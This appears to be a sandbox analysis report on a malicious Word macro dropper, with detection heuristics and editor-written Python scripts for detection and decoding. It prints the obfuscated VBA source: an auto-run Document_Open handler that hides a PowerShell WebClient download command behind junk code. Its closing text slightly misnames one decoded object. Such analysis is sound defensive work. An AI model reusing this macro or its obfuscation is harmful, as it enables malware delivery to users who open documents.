Verdict: MALICIOUS (risk score 222)
Malware Insights

MITRE ATT&CK
- T1059 Command and Scripting Interpreter
- T1059.005 Command and Scripting Interpreter: Visual Basic
The sample is a malicious Office document containing a VBA macro. Execution starts in the Document_open event handler, which calls kiijoHIOIrf(); that function passes a string to VBA.Shell() with a window style of 11152 - 11152 = 0 (vbHide), so the spawned process has no visible window. The command line is assembled at run time from fragments rather than stored as one string: Chr(ViGfhmcjGr + vbKeyP + wzNJJTpkPi), where vbKeyP is 80 and the two surrounding variables are never assigned in the visible source (an unassigned Variant is Empty and evaluates to 0 in arithmetic), yields "P"; "owers" follows; and boCvXzpW() returns a literal that begins "HeLL ( [cHAR[]](" and continues with a comma-separated list of integers, i.e. a PowerShell invocation that rebuilds its real script from a numeric character array. The surrounding Tan(), CDbl(), Rnd() and Log() statements operate on undefined variables, are made harmless by On Error Resume Next, and exist only to bury the single meaningful call. Together with the ClamAV Doc.Dropper classification, this indicates the document is designed to download and execute a second-stage payload, consistent with dropper malware.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6591589-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6591589-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): the document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): the macro calls Shell() to spawn a process.
- Document_Open macro (high, OLE_VBA_DOCOPEN): the macro defines a Document_Open handler, so it runs as soon as the document is opened with macros enabled.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier used by Office file formats; it is a fixed schema name, not a network resource the document contacts, and should not be treated as an indicator of compromise.
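The OLE_VBA_PCODE_AUTOEXEC_EXEC rule above fires on the co-occurrence of an auto-execution entry point and an execution token. The following Python script is an added example written for this page, not code from the analyzer or from the report; it applies the same pairing logic to decoded VBA source text (the analyzer matches tokens in the compiled p-code stream instead), with token lists chosen by the editor as an approximation of the rule. The two inputs are constructed: an excerpt of the macro preview below reduced to its entry point and its one meaningful call, and a benign macro for comparison.

```python
import re

# Token lists are an editor's approximation of the OLE_VBA_PCODE_AUTOEXEC_EXEC
# rule (assumption): the analyzer matches tokens in the compiled p-code stream,
# this scans decoded VBA source text instead.
AUTOEXEC_TOKENS = ["AutoOpen", "AutoExec", "Document_Open", "Auto_Open",
                   "Workbook_Open", "AutoClose", "Document_Close"]
EXEC_TOKENS = ["Shell", "WScript.Shell", "CreateObject", "GetObject",
               "URLDownloadToFile", "XMLHTTP", "WinHttpRequest",
               "powershell", "cmd.exe"]

# Constructed excerpt of the macro preview: entry point plus the single
# meaningful call, with the padding statements omitted.
MALICIOUS_EXCERPT = r'''
Private Sub Document_open()
On Error Resume Next
XnEoO = Tan(78516)
kiijoHIOIrf
End Sub
Function kiijoHIOIrf()
On Error Resume Next
kiijoHIOIrf = qpNnumc + VBA.Shell(uPsVGsutpU + Chr(ViGfhmcjGr + vbKeyP + wzNJJTpkPi) + "owers" + boCvXzpW + PaPPH, 11152 - 11152)
End Function
'''

# Constructed benign macro for comparison: no auto-exec entry point, no exec call.
BENIGN_MACRO = r'''
Sub FormatReport()
    ActiveDocument.Range.Font.Name = "Calibri"
End Sub
'''


def find_tokens(source, tokens):
    """Case-insensitive whole-identifier match (VBA identifiers are case-insensitive).
    A preceding '.' is allowed so that VBA.Shell and WScript.Shell both hit 'Shell'."""
    return [t for t in tokens
            if re.search(r'(?<!\w)' + re.escape(t) + r'(?!\w)', source, re.IGNORECASE)]


def autoexec_with_exec(source):
    """Return (auto_hits, exec_hits, fired). fired mirrors the rule: at least one
    auto-execution token AND at least one execution token in the same module."""
    auto = find_tokens(source, AUTOEXEC_TOKENS)
    execs = find_tokens(source, EXEC_TOKENS)
    return auto, execs, bool(auto and execs)


if __name__ == "__main__":
    for name, src in (("sample", MALICIOUS_EXCERPT), ("benign", BENIGN_MACRO)):
        auto, execs, fired = autoexec_with_exec(src)
        print(f"{name}: autoexec={auto} exec={execs} fired={fired}")
```

The scan fires on the sample because the entry-point name Document_open and the VBA.Shell call are bare identifiers rather than string literals, so the string-splitting trick cannot hide them from a token scan; by contrast the "powershell" token never matches, because the macro assembles it from "P" + "owers" + "HeLL" at run time. That is why the analyzer's rule keys on API and entry-point tokens rather than on the command being run, and why the p-code variant of the rule still works on documents whose source stream was stripped.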
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14501 bytes | 66253e10452835001cbf3ae9b87284b81b8bc04574d007684d611c25eebeda42 |

Script preview (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "MwmQJVCkpVlcb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function kiijoHIOIrf()
On Error Resume Next
OzrinG = Tan(20131)
iCcTSm = zSkSrA
CzJjMS = CDbl(TJqMAC * CDbl(AbBik + Int(QUcHAj * Rnd(49402)) * aQMOz * Log(78219 * FhWLr - LslGR + Fix(51))))
vutfT = pEbrAi
iWBfc = CDbl(QstdwD)
UYErCY = Tan(20134)
pJnCS = Tan(96879)
Ynjjqi = kSzIIO
TCzDU = CDbl(VKGfA * CDbl(ciuIMF + Int(QpHLMo * Rnd(69961)) * EmcisU * Log(60698 * TliEuR - jDfuG + Fix(51))))
raXhBv = baIhud
LqlOkT = CDbl(YiwIc)
KWjhY = Tan(15593)
qpLMM = Tan(34848)
dAPTaB = CHXSJY
mFBWz = CDbl(liDUG * CDbl(BvpQiG + Int(MzWShV * Rnd(95142)) * YAJcUF * Log(98844 * jiDWwu - wvNlzt + Fix(51))))
FGlfj = SCZXU
nUBCS = CDbl(husmk)
OcojZW = Tan(131)
jpdaw = Tan(18680)
hawKBT = hNCCbB
oGFJcM = CDbl(PqPzRE * CDbl(AXZcir + Int(iKbdQ * Rnd(43772)) * pXUtjB * Log(6299 * EKovz - kjKkP + Fix(51))))
WuSOn = tDudRs
KwdjMp = CDbl(aTvGi)
wsLJUQ = Tan(14252)
kiijoHIOIrf = qpNnumc + VBA.Shell(uPsVGsutpU + Chr(ViGfhmcjGr + vbKeyP + wzNJJTpkPi) + "owers" + boCvXzpW + PaPPH + hBBzHZtXXjr + ORjpTU + cUdtwrjbw + JVNAEGo, 11152 - 11152)
jiQsk = Tan(85867)
ZtJbi = FnrRlD
MjlWO = CDbl(NQYPSL * CDbl(LWFaZB + Int(Iidlr * Rnd(70157)) * dFLcr * Log(27501 * nlSdfH - JAdrPp + Fix(51))))
kmzut = zdAucu
iDAfia = CDbl(KMmazw)
SEztt = Tan(93129)
LWozp = Tan(77561)
iSwAj = wnqQR
swvTwq = CDbl(uFDFC * CDbl(fonRCT + Int(CSCUzt * Rnd(25851)) * BpJdKD * Log(5571 * bbmREB - fMvRB + Fix(51))))
LqPBXB = WHDbM
wbUEcq = CDbl(Ptcsfc)
uXvkHV = Tan(91976)
End Function
Private Sub Document_open()
On Error Resume Next
XnEoO = Tan(78516)
zAGhoN = kmkDl
TzjYv = CDbl(mIZTQ * CDbl(QaDwXv + Int(QzsLj * Rnd(64922)) * JthkW * Log(1388 * nvqnwk - cUajq + Fix(51))))
diMIaK = nfSis
VZbowq = CDbl(ItbpwP)
pTVjU = Tan(29631)
rKJdKP = Tan(39751)
NUCqF = uitkj
SuIrjn = CDbl(LhtJJE * CDbl(slEjU + Int(uRPKK * Rnd(36022)) * IZFmh * Log(90524 * KvOzM - EJnULs + Fix(51))))
DwWHXn = ldvzS
AizjNS = CDbl(lcHbO)
pWosVi = Tan(40424)
kiijoHIOIrf
KjapB = Tan(89247)
JRQQwO = XLMjdA
NmWncJ = CDbl(XjwOjp * CDbl(WBfJo + Int(tfGrYY * Rnd(54501)) * SjPoj * Log(79100 * dEppQs - hRBSYK + Fix(51))))
swqTXG = zopGz
jiOEhj = CDbl(zjZAA)
dwPbcS = Tan(50779)
qlloB = Tan(93789)
DwZali = iiicS
YINpG = CDbl(vnjrp * CDbl(EQVww + Int(aVFiwW * Rnd(31860)) * ouYPFN * Log(76935 * sCuNih - HUEkRj + Fix(51))))
XSCjLt = wOrmwB
qMrYY = CDbl(BOTlcU)
LIDpz = Tan(59351)
End Sub

Attribute VB_Name = "EndRLrICqC"
Function boCvXzpW()
On Error Resume Next
FfbjDv = Tan(3805)
Buaas = CDbl(khbiL)
qXIhk = Tan(68505)
ztIqj = CDbl(fwwuki * CDbl(wsRBSN + Int(IFSiz * Rnd(57503)) * zXTjzU * Log(51840 * mTtUV - wkEJi + Fix(51))))
jzuMGn = ZjDwH
JOqGzI = shKUOY
VSJpSnzNkz = "HeLL ( [cHA" + "R[]](4 ,73" + " ,104 ,86,116,7" + "3 , 0,29" + " ,0" + " ,78 , 69 ,87 " + ", 13,79,6" + "6,74 ,69 ,67"
NzZPl = Tan(96289)
fBfLT = CDbl(HRDji)
zsWXwj = Tan(20353)
XYBzRL = CDbl(mrWra * CDbl(BirlI + Int(tNVtp * Rnd(61021)) * DHjHsn * Log(26504 * BqMzH - MLYth + Fix(51))))
QZLLt = OkoWG
NqAnf = AIjCzA
lFbYJnqHX = " ," + " 84 ,0 , " + "82,65 " + ", 78 ,68" + " ,7" + "9 ,77,27 " + ",4, 80," + "107 ,68," + " 75,101, "
vuLlL = Tan(16881)
KIrGM = CDbl(Oquiu)
FAOPN = Tan(92305)
OdXJsi = CDbl(NfCjdE * CDbl(DYdwjr + Int(SbMAAc * Rnd(59733)) * RLmuJ * Log(72002 * YkSDUv - aUMvjz + Fix(51))))
cApzL = jjwuH
YztdcX = mAsoFw
MEauIH = "66 ,0 , " + "29, 0 , 78 " + ",69 , " + "87, 13 ,79 ,6" + "6 , 74,69 ,67" + " , 84, 0,115 , " + "89 ," + " 83 ,84, 69, 77" + ", 1"
zLKXiw = Tan(79697)
vWFdo = CDbl(kAIjAU)
EDZCi = Tan(52277)
HMXls = CDbl(JBSTlJ * CDbl(KCfWEw + Int(wmQBf * Rnd(29433)) * UQSKFJ * Log(19326 * znmmPf - vIqndb + Fix(51))))
NcbzHm = jadAm
DsjRj = WqHLs
WiMJCrbEs = "4 ,110,69 ,84," + " 14,119, 69" + " ," + " 6" + "6 ,99, 76, " + "73" + ",69 , 78,84," + "27 ,4 , 73," + "66 , 7" + "9, 86 ,65 ...
```
(truncated)
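The string the macro hands to VBA.Shell() never appears in one piece: the preview stops before boCvXzpW() returns, and its literals are split mid-number ("7" + "3", ", 1" + "4") so that no single literal contains a decodable token. The following Python script is an added example written by the editor, not code from the report or the analyzer. It joins the literals shown in the preview in source order (the concatenation order is an assumption, since the function's return is truncated), pulls the integers out of the [char[]](...) construction, and, because the decode loop itself is cut off by the truncation, brute-forces a single-byte XOR key with a printability-and-keyword score. The keyword list and the scoring are the editor's choice; what the script recovers is an inference from the visible fragments, not a finding stated in the report.

```python
import re
import string

# Constructed from the boCvXzpW() string assignments in the macro preview above.
# The preview is truncated before boCvXzpW returns, so the order in which the four
# variables are concatenated is assumed to be their source order.
VBA_EXCERPT = r'''
VSJpSnzNkz = "HeLL ( [cHA" + "R[]](4 ,73" + " ,104 ,86,116,7" + "3 , 0,29" + " ,0" + " ,78 , 69 ,87 " + ", 13,79,6" + "6,74 ,69 ,67"
lFbYJnqHX = " ," + " 84 ,0 , " + "82,65 " + ", 78 ,68" + " ,7" + "9 ,77,27 " + ",4, 80," + "107 ,68," + " 75,101, "
MEauIH = "66 ,0 , " + "29, 0 , 78 " + ",69 , " + "87, 13 ,79 ,6" + "6 , 74,69 ,67" + " , 84, 0,115 , " + "89 ," + " 83 ,84, 69, 77" + ", 1"
WiMJCrbEs = "4 ,110,69 ,84," + " 14,119, 69" + " ," + " 6" + "6 ,99, 76, " + "73" + ",69 , 78,84," + "27 ,4 , 73," + "66 , 7" + "9, 86 ,65"
'''

# A VBA string literal; "" inside a literal is an escaped quote.
LITERAL = re.compile(r'"((?:[^"]|"")*)"')


def join_vba_literals(vba_source):
    """Concatenate every string literal in source order, as the `+` chain does at
    run time. Digits are split across literals ("7" + "3"), so this must happen
    before any number is parsed."""
    return "".join(m.group(1).replace('""', '"') for m in LITERAL.finditer(vba_source))


def char_array_ints(powershell_text):
    """Return the integers of a PowerShell [char[]](n, n, ...) construction."""
    m = re.search(r'\[char\[\]\]\s*\((.*)', powershell_text, re.IGNORECASE | re.DOTALL)
    return [int(n) for n in re.findall(r'\d+', m.group(1))] if m else []


def xor_decode(values, key):
    return "".join(chr(v ^ key) for v in values)


# Keyword list and scoring are the editor's heuristic (assumption), not the report's.
KEYWORDS = ("new-object", "webclient", "downloadfile", "downloadstring", "start-process", "$")


def score(text):
    """Printable-ASCII ratio plus one point per PowerShell keyword present."""
    printable = sum(c in string.printable for c in text) / max(len(text), 1)
    return printable + sum(k in text.lower() for k in KEYWORDS)


def brute_force_xor(values):
    """The decode loop is not visible in the truncated preview, so try every
    single-byte XOR key and keep the one whose output looks most like PowerShell."""
    return max(((k, xor_decode(values, k)) for k in range(256)), key=lambda kv: score(kv[1]))


if __name__ == "__main__":
    joined = join_vba_literals(VBA_EXCERPT)
    values = char_array_ints(joined)
    key, decoded = brute_force_xor(values)
    print(f"{len(values)} values, best key {key}: {decoded!r}")
```

Run as-is; it prints the key and the recovered command prefix. On the 75 integers visible in the preview the highest-scoring key is 32 (a case-flip XOR), and the decoded text is a PowerShell preamble that creates a System.Net.Random object and a System.Net.WebClient object, which is what makes the report's "download a second-stage payload" conclusion concrete. Everything after the last visible literal is lost to the truncation; the download URL and the remainder of the command are not recoverable from this page.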